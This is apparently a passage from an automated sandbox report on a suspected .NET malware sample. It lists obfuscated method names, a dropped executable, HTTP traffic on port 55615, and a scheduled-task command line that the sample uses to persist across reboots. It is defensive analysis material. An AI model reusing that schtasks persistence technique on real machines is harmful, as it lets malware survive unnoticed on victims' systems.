                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, x8Wai58sQjhcjF80lr.csHigh entropy of concatenated method names: 'oBvEmQ7VHD', 'sIRETqcL75', 'RAqEfmQRZF', 'YWbE8DLE6m', 'OafEdIfug8', 'a03E9S9ib0', 'h4EErSyB93', 'AWdEWPNOpl', 'J7AEuvffsx', 'JEXEe5lE8q'
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, Q1SJ81X2uYyCoeCbSI.csHigh entropy of concatenated method names: 'M9eDGp42Ls', 'i2IDAw87gF', 'YsBEZo6Bc8', 'i1eEKtjrSd', 'pstEwviUAi', 'SwwE03XmrS', 'iZtEpQ4OLW', 'eu5ER6Qeop', 'nvPEFlNl5G', 'MyCEq0UK5R'
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, NAOrPkEcVdZdY5vb0y.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'kBL3sHrPsE', 'sIw3PPIuN6', 'G1P3zPc5AL', 'ROlyNv9uSF', 'aoXyIiWxBw', 'Xo8y3oDXNR', 'H4uyyCuWlC', 'Yw902A2Ys0I7eNB1Ijc'
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, nd8rSeaGhR6IXfvpaP.csHigh entropy of concatenated method names: 'nyoWlYoQTH', 'aWRWOxgEWJ', 'U4RWEy7Frq', 'TcXWDVRCpU', 'hYtWofVljy', 'EcRWk91sAx', 'GGEWUjQNre', 'QcnWvIxMHo', 'YpVW6gOg4G', 'fMEW5kU6bt'
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, X9VLTpIIXQUUYtDcS68.csHigh entropy of concatenated method names: 'ToString', 'SxIey9PZjb', 'zS7eSpPxAi', 'aRFecOo9SB', 'Ep5elwWQq9', 'NEreO4e3C1', 'H9YeEH8Og5', 'TdGeDU1gfn', 'U2mNnq7ptRLM2xl0Ixh', 'VLSfgI7MuZ2SFdidUd5'
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, LKBf0PiCcs2cb4t0Wm.csHigh entropy of concatenated method names: 'EVBgfAbpMP', 'K05g8iDhIx', 'wSogx3f0F6', 'vjIgYgRxZa', 'FNDgKkhUFG', 'y01gw0xEZG', 'Jf0gpCJ7b2', 'iefgRThglv', 'QrugqLZPrk', 'Snggt69Y9M'
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, O2tGaT14GM0PR0bByI.csHigh entropy of concatenated method names: 'qpNra4GwoK', 'yU7rPNaBIq', 'z7rWN52Nha', 'wvVWIFkxUx', 'RdartAXFEg', 'xkYrjEXP7N', 'iKnriwdWPy', 'ivZrV6AKHR', 'olPr4yAOS7', 'dknrCVxiwf'
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, EHDhQ9fEEtfuXrOd2d.csHigh entropy of concatenated method names: 'IcHOVCEBdT', 'A0AO4gdkmZ', 'ywlOChc6jA', 'mmUOnneJou', 'hk6OBNI1Tj', 'uukO1aMswm', 'H37OQPXQa4', 'wstOa4YZqe', 'oxXOs9LpEG', 'C0xOP4Uu0r'
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, TQh3vTC7SUbllLjr5F.csHigh entropy of concatenated method names: 'ToString', 'teL9tpU2tE', 'Ock9Yj2SXe', 'wq69ZyL2rc', 'Qlq9KAI2GO', 'fQJ9weRBvW', 'Mvu90qFn8Z', 'vMl9pMuj16', 'PyX9RpR7SH', 'HcN9FFkv36'
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, vRVBQ5pi5wIpjLbJ0F.csHigh entropy of concatenated method names: 'Mnekl7Wv4P', 'PUCkEftAbD', 'mNLkoaFujI', 'mRAoPOEMuR', 'vPuozp9CIY', 'Af8kN9aqrc', 'befkIvlOQE', 'FBGk3Sbxbr', 'rClkyKTC1M', 'tuAkS2F3il'
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, NaWWy236mBYlIC15Ig.csHigh entropy of concatenated method names: 'Of623GOAp', 'QNFmRDnSb', 'XvJTMQmvn', 'RW2ACKioS', 'TFq8D9xEJ', 'YtAX7Di3c', 'K893J6FotHkPB2Rkc8', 'uqncu2bTgD0pLyY0AJ', 'F95WfHSCc', 'TFTedlkxs'
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, T4Pxs9nCsGaJbVXZLr.csHigh entropy of concatenated method names: 'YXjr6nNnEt', 'PuEr5E0yrN', 'ToString', 'UUwrlkSdc3', 'H21rO3lk6r', 'oWwrEvcaOy', 'ILirDTTQ4y', 'zk0roOMMN7', 'i7RrkcIg29', 'YVcrU347Ve'
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, bE2mGsIyHT2OX6boTqq.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'GDoeVimwAm', 'BFje4LDAv5', 'x3NeCo898a', 'VEyen3v6ZP', 'POjeBxNrtW', 'OwCe1XMOyH', 'BKPeQOuDhT'
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, qKJJQiKg8PHsV2A7Rh.csHigh entropy of concatenated method names: 'JNRoM8lZWM', 'IQmoH7gls0', 'IY3o2y7r72', 'c2Rom1GU5k', 'fQ8oTbEMnw', 'f65oADXpj5', 'WGNo8Aumsc', 'uQPoXtBydn', 'VSnb83HgEnePP04fn9W', 'zNpTmHH4Y8hlZjl1FNy'
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, CYJeEKV7oSpgndxICZ.csHigh entropy of concatenated method names: 'LFVdqDJ5Rr', 'o9SdjThRPT', 'oKYdVDaN3F', 'nbad4uIgHk', 'X2CdYOTgZs', 'nxydZMlWoy', 'UJNdKJn6p4', 'VSNdwxof08', 'MDTd00v0fR', 'je9dpvSfdI'
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, hYO4sGINkmwQXfuFmpw.csHigh entropy of concatenated method names: 'GKjuHekkCE', 'lxpuh1bswT', 'Vfuu26DHhv', 'nWauml8Wdk', 'e6RuGwvO9e', 'RXauT1nWZJ', 'FiyuA9fkFo', 'I01ufx5saQ', 'su9u8y4mCj', 'UJ5uXFwNaw'
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, OGIZdHO3vNmwVLxrLN.csHigh entropy of concatenated method names: 'Dispose', 'bgGIs1cjHd', 'o503Y04JaK', 'hHL339roQy', 'IgdIP8rSeG', 'yR6IzIXfvp', 'ProcessDialogKey', 'WPf3NiHkjp', 'gXU3INhEBZ', 'zMT33YPKmg'
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, cekC21ULw7jnXCJgV1.csHigh entropy of concatenated method names: 'NtlycWe0df', 'CQZylfPKui', 'Ee7yOvZtbM', 'KVgyEcA25Z', 'XbUyDIIoW0', 'qQAyok6MFf', 'txsykipOhs', 'zJryUJu9vO', 'XdbyvGWFUe', 'Aaqy6bXyDO'
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, XhO8u6zZZyZGdGFXJ9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HkuugdY9sA', 'y4MudcruRi', 'w7xu9yimlh', 'mmWur7Xl5C', 'FsfuWSkEM4', 'fwsuu7aVME', 'U3eueuqc1b'
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, OMwIIfxw6W4dmq9fUH.csHigh entropy of concatenated method names: 'ObHocbldyW', 'CwPoOUAtqQ', 'ILloDTvekQ', 'wfcokGKI3F', 'I8ioUHPDJW', 'tamDBFnCHe', 'QosD1wRJV9', 'jFMDQa4cTQ', 'CedDaUCN7x', 'TXFDsKKi3S'
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, kVEbfGFamCto0jMeSX.csHigh entropy of concatenated method names: 'rIdkHGjDGC', 'pgZkheuVVF', 'CUjk2NKMdZ', 'mD8kmTRAi3', 'x2kkGVPceH', 'BaxkTdoiEt', 'B3jkAfIZdU', 'FPJkfcYfOC', 'Wmvk81jLEm', 'VcwkX6GI5I'
                    Source: 0.2.l2rMtmFkD6.exe.3b20c50.2.raw.unpack, DiHkjpsEXUNhEBZ2MT.csHigh entropy of concatenated method names: 'U4BWx0K6xd', 'KPkWY1ZZgn', 'mgCWZPiufu', 'iKTWKshajF', 'SxKWVXLMmq', 'XtRWwBgk7P', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeFile created: C:\Users\user\AppData\Roaming\ECcZgk.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECcZgk" /XML "C:\Users\user\AppData\Local\Temp\tmp5831.tmp"

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49719
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\l2rMtmFkD6.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
